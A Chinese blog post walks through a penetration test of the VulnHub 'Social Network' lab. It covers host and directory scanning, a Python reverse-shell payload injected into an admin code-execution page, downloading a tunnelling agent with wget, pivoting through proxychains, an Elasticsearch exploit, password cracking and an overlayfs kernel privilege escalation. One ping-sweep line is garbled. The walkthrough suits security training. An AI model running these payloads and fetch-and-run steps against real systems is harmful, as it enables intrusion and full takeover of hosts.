渗透测试流程模拟01

最新推荐文章于 2024-08-04 08:30:00 发布
最新推荐文章于 2024-08-04 08:30:00 发布
阅读量244 收藏
点赞数
分类专栏: 渗透测试流程思路完整模拟
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SCR_123/article/details/119697389
版权

靶场下载地址:http://www.vulnhub.com/entry/boredhackerblog-social-network,454/

主机发现

nmap 192.168.56.0/24

端口扫描

对靶机全端口扫描nmap -p- 192.168.56.0/24
在这里插入图片描述

服务扫描

查看端口运行的的服务,Werkzeug为基于python开发的底层框架,后端开发为python,后续利用python脚本反弹shell,获取控制权
在这里插入图片描述

漏洞发现

打开浏览器,是一个社交网站,通过网站可以匿名发布信息,首先可对该页面进行安全性探测,并没有发现漏洞
在这里插入图片描述

接下来对隐藏路径进行发现(常规操作),利用dirsearch路径爬取工具(apt install dirsearch),dirsearch -u http://192.168.56.101:5000
在这里插入图片描述

漏洞利用

进入发现的目录http://192.168.56.101:5000/admin,利用python的代码执行功能,向表单中注入一段python代码触发反弹shell
在这里插入图片描述

import socket,subprocess,os 
 
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 
s.connect(("192.168.56.103",4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2) 
p=subprocess.call(["/bin/sh","-i"])

先kali启动侦听 nc -nvlp 4444,后执行反弹shell代码
在这里插入图片描述

点击代码执行test code,反连成功
在这里插入图片描述

查看权限发现为root权限,当前目录下有dockerfile这个目录,进一步证实当前root权限是否属于docker系统
如何辨别docker容器:
ls /.dockerenv(.dockerenv文件存在,说明本系统为docker系统)
cat /proc/1/cgroup如下也可说明为docker容器
在这里插入图片描述

查看当前docker的ip地址,发现内网网段inet addr:172.17.0.3 Bcast:172.17.255.255 Mask:255.255.0.0,接下来在内网进行主机的发现。
for i in ( s e q 110 ) ; d o p i n g − c 1172.17.0. (seq 1 10); do ping -c 1 172.17.0. (seq110);dopingc1172.17.0.i; done
发现172.17.0.1/172.17.0.2为存活主机

内网穿透

需将agent_linux_x64客户端程序送至到目标主机上
在这里插入图片描述

首先、运行服务端./admin_linux_x64 -lport 9999 开启监听端口
在这里插入图片描述

在当前目录发布一个http服务,端口80
在这里插入图片描述
在目标主机访问http服务 wget http://192.168.56.103:80/agent_linux_x64,文件已下载到目标主机,chmod +x agent_linux_x64赋予执行权限
执行反链指令:./agent_linux_x64 -rhost192.168.56.103 9999
在这里插入图片描述
在此节点启动sock侦听,端口1080,启动了在1080端口上侦听的socks代理。为了kali的工具对内网有作用,需proxychains4工具,将其代理端口更改为socks的1080(vi /etc/proxychains4.conf)
在这里插入图片描述在这里插入图片描述
挂上proxychain,使用nmap对内网172.17.0.1进行扫描,proxychains4 nmap -Pn -sT 172.17.0.1
在这里插入图片描述在这里插入图片描述
proxychains4 nmap -p22,5000 -Pn -sT -sV 172.17.0.1
在这里插入图片描述
proxychains4 nmap -p9200 -Pn -sT -sV 172.17.0.2,扫描另一台容器
在这里插入图片描述
使用searchsploit Elasticsearch,发现相关漏洞
在这里插入图片描述
将攻击脚本复制到当前目录,cp /usr/share/exploitdb/exploits/linux/remote/36337.py . 查看内容,为python2编写
proxychains4 python2 36337.py 172.17.0.2 反弹shell
查看密码文件夹中的数据,破解,得到john,1337hack
在这里插入图片描述

提权

使用当前密码ssh登陆192.168.56.101 ssh john@192.168.56.101
sudo -s
在这里插入图片描述
ssh连接成功后,返回内核版本,利用其内核漏洞提权 Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic x86_64)或命令查询uname -a
searchsploit linux 3.13搜索是否有内核漏洞
在这里插入图片描述
cp /usr/share/exploitdb/exploits/linux/local/37292.c . 将攻击脚本拷贝到当前目录,查看源代码后发现是c语言编写,查看使用说明,执行前需要编译操作,目标主句没有编译工具的时候,在本地编译好,直接在反弹shell中执行
在这里插入图片描述
当前文件在文件执过程中再次调用gcc,当前代码是将c语言库文件编译成二进制so文件
解决方法:直接从kali找到编译好的库文件,将原文件中的涉及库文件编码的程序删除掉,重新编译
在这里插入图片描述在这里插入图片描述
gcc -o exp 37292.c 编译更改后的源码
locate ofs-lib.so 根据文件名称定位编译好的库文件
cp /usr/share/metasploit-framework/data/exploits/CVE-2015-1328/ofs-lib.so . 将文件拷贝到当前目录
在当前目录下启用http服务,python3 -m http.server 80
wget http://192.168.56.103 exp
wget http://192.168.56.103 ofs-lib.so
将文件拷贝到tmp目录下赋予执行权限
./exp

时间胶囊vdd
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
模仿黑客攻击的渗透测试流程
pygain的博客
03-23 3274
黑客脑图
记录一次模拟渗透
0verWatch的博客
07-25 581
前言 今天还模拟了一次真实的挖洞过程,今天这网站一共有三个漏洞(都是要经过提醒才能弄出来),因为是搭的环境,简单记录一下思路,顺便当个回顾,源码啥的都没有了,耍完就要求删掉了。 正文 这台服务器有个前提就是跟我们一个网段的服务器,并且开了IIS服务,但是前提我们是不知道他的ip的,这个时候我们需要用一下nmap来扫一下同一网段下的ip nmap -sP -PI -PT 192.16...
渗透测试_真详细!以实战学习渗透测试流程及报告(图文+视频讲解)
VN520的博客
08-02 532
学习干货|小白女友看完这篇文章后,面试工作和护网蓝队初级竟然秒通过!*** 如您认为文章质量对您有所帮助,麻烦点个关注并转发让更多人看到**[渗透测试|一次丝滑的渗透测试记录][漏洞挖掘|记一次对某杀猪盘的漏洞挖掘(反诈)
渗透测试|真详细!以实战学习渗透测试流程及报告(图文+视频讲解)
最新发布
liuhyusb的博客
08-04 688
学习干货|小白女友看完这篇文章后,面试工作和护网蓝队初级竟然秒通过!*** 如您认为文章质量对您有所帮助,麻烦点个关注并转发让更多人看到**[渗透测试|一次丝滑的渗透测试记录][漏洞挖掘|记一次对某杀猪盘的漏洞挖掘(反诈)
云演CTF: 005.Blog
wanguixiu的博客
06-09 827
云演CTF: 005.Blog 作者: admin 时间: 2021-05-28 分类: 云演CTF 网站是个没有内容的博客,返回头表明了后端语言"Werkzeug/1.0.1 Python/2.7.6",尝试几个"www.zip,robots.txt"之类的路径没什么发现,然后各个标签点了点,发现了/div/目录,是这个样子的google一...
Werkzeug更新带来的Flask debug pin码生成方式改变
BlusKing
07-06 1307
前言: 首发在Freebuf:https://www.freebuf.com/articles/network/238485.html于2020.4月成稿,时隔3个月被发布,内容为flask debug pin码构造方式的改变。 正文: 复现2020GYCTF-FLASKAPP及 2019CISCN double_secret出现异常。题目本身有两个解题方式。其中一个思路是: 当Flask开启debug模式时,可以在报错页面输入pin码来执行python命令。 ...
渗透测试流程图.zip
04-06
渗透测试是一种安全评估方法,通过模拟黑客攻击行为来检测网络和系统的脆弱性。这份"渗透测试流程图.zip"文件包含了详细的渗透测试过程,主要目的是帮助IT专业人士和安全工程师理解并实施这一过程。其中的"渗透测试...
渗透测试,靶场,模拟搭建渗透测试真实环境,搭建靶场详细流程即相关包.zip
12-05
内容:详细的渗透测试靶场搭建包,以及详细搭建流程,提供了靶场所有环境,比如sql注入,木马,获权等模拟真实环境 适用于:需要学习渗透测试相关知识,但是没有搭建好模拟真实环境的靶场人群下载以及使用,同时针对...
渗透测试标准流程图[诸葛建伟].pdf
08-13
"渗透测试标准流程图" 本文档旨在描述渗透测试的标准流程图,涵盖了渗透测试的整个生命周期,从初始阶段到报告阶段。该流程图旨在帮助渗透测试人员和组织更好地理解和实施渗透测试,以便更好地保护信息系统和资产。...
渗透测试流程.zip
04-06
渗透测试是网络安全领域中至关重要的一个环节,它模拟黑客攻击行为来评估系统和网络的安全性。在这个"渗透测试流程.zip"文件中,我们主要聚焦于渗透测试工程师面试中可能遇到的问题和相关知识点。以下是关于渗透测试...
渗透测试流程
01-27
渗透测试流程是网络安全领域中一项至关重要的实践,它模拟黑客攻击行为来评估系统和网络的安全性,以便发现并修复潜在的漏洞。在这个过程中,专业的安全人员遵循一系列有序的步骤,确保全面、有效地评估目标系统的...
内网靶机实战
qq_41672971的博客
01-29 877
1111111111111111111111
[原创]夺棋赛HackTheBox OpenSource攻略
huandaohack的专栏
06-26 2541
夺棋赛HackTheBox OpenSource攻略
Flask debug模式算pin
遇事不决冲冲冲
03-21 5372
## 什么是PINpin码也就是flask在开启debug模式下,进行代码调试模式的进入密码,需要正确的PIN码才能进入调试模式 ## 如何生成 这里就列一个了,前面全是获取值,最后进行加密,版本不同区别也就就是3.6与3.8的MD5加密和sha1加密不同
靶机一:BOREDHACKERBLOG_ SOCIAL NETWORK
travelnight的博客
11-08 2015
靶机一:BOREDHACKERBLOG: SOCIAL NETWORK 靶机渗透
werkzeug 详解
热门推荐
perfectsorrow的博客
05-08 2万+
首先,先向大家介绍一下什么是 werkzeugWerkzeug是一个WSGI工具包,他可以作为一个Web框架的底层库。这里稍微说一下, werkzeug 不是一个web服务器,也不是一个web框架,而是一个工具包,官方的介绍说是一个 WSGI 工具包,它可以作为一个 Web 框架的底层库,因为它封装好了很多 Web 框架的东西,例如 Request,Response 等等。例如我最常用的 Fla...
VulnHub BOREDHACKERBLOG SOCIAL NETWORK
weixin_45682839的博客
08-28 292
VnlnHub BOREDHACKERBLOG SOCIAL NETWORK靶机通关攻略记录,涉及知识包括:端口服务扫描、铭感目录发现、代码执行漏洞利用、内网穿透代理、漏洞利用、linux提权、exp代码修改等
Werkzeug教程
奋斗
07-22 1万+
原文链接:http://werkzeug.pocoo.org/docs/tutorial/ 欢迎来到Werkzeug教程,这里我们将会创建一个仿制TinyURL的应用,将URLs存储到一个redis实例。为了这个应用,我们将会使用的库包括,用于模板的Jinja 2、用于数据库层的redis和用于WSGI层的Werkzeug。 你可以使用pip安装需要的库: [plai
渗透系列之flask框架开启debug模式研究
Websec
09-28 2032
渗透系列之flask框架开启debug模式漏洞分析 参考文章: https://zhuanlan.zhihu.com/p/32138231 https://xz.aliyun.com/t/2553#toc-2 https://www.dazhuanlan.com/2019/12/05/5de8c90ee03dd/?__cf_chl_jschl_tk__=6297c338db1048cd0af15fe375956340bbce6156-1601270282-0-AYlx_7583zw_1g7Q7rHB
企业渗透测试:风险规避与流程详解
渗透测试不仅仅是模拟外部黑客的入侵,也包括对内部威胁的防范,因此它可以涵盖黑盒、灰盒甚至白盒测试的不同范畴。测试人员可能会获得一些关于系统的信息,以便更全面地评估安全状况。技术层面,渗透测试通常涉及...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值